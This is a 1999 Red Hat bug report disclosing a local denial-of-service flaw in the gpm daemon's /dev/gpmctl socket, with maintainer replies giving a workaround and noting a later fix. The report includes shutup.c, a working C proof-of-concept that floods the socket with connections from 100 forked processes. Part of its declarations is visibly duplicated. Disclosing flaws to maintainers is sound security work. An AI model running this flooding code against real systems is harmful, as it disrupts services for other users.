Bug 7478 - DoS in gpm
Summary: DoS in gpm
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: gpm
Version: 6.1
Hardware: i386
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Bernhard Rosenkraenzer
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1999-12-01 13:25 UTC by cadence
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2000-01-13 22:14:56 UTC
Embargoed:


Attachments (Terms of Use)

Description cadence 1999-12-01 13:25:43 UTC
Hello.

There is simmilar to sysklogd bug in gpm.
It listening on /dev/gpmctl and uses STREAM.

Any user can simply DoS the gpm and (in several circumstances) the whole
system.

Below is the sample code to DoS the gpm.
I couldn't write an exploit to ALWAYS crash the whole system, but I did it
few times. I don't know why it works and why not.
I think that You are much better programmers than I so You can do it
Yourself :)
If i will write working exploit I will NOT public it, so don't worry.


Solutions?
I don't sure if the STREAM is needed by gpm. Maybe DGRAM will be good
solution for that?
Or maybe some changes of permissions on /dev/gpmctl?

Best regards.

Tomasz Grabowski  (0-91)4333950
Akademickie Centrum Informatyki
cadence.pl


-------------------------------------------------------------------------

Below is the shutup.c writen by someone else.
I made only few little changes to work with gpm.


#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

#define PATH    "/dev/gpmctl"
#define SHUTUPS 2000
#define PROCS   100

int
main (void)
{
  int s, i;
  struct sockaddr_un sun;
  char host[128];
sockaddr_un sun;
  char host[128];

  sun.sun_family = AF_UNIX;
  strncpy (sun.sun_path, PATH, 100);
  gethostname (host, 128);

  if (fork ())
    exit (0);

  for (i = 0; i < PROCS; i++)
    if (fork () == 0)
      break;

  for (i = 0; i < SHUTUPS; i++)
    {
      if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
          perror ("socket");
          while (1);
        }

      if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) <
0)
        {
          perror ("connect");
          close (s);
          i--;
        }
    }

  while (1);
}

Comment 1 Bernhard Rosenkraenzer 1999-12-01 15:20:59 UTC
gpm does need STREAM. There's no easy fix for this one.
If you change permissions on /dev/gpmctl, you lose functionality.

The quickfix is to just rm /dev/gpmctl.
This will prevent things like gpm-root from working, but basic gpm functionality
is still there.

I'm looking at it to see if/how it can be fixed without losing functionality.

Comment 2 Bernhard Rosenkraenzer 2000-06-15 21:25:11 UTC
Fixed.


Note You need to log in before you can comment on or make changes to this bug.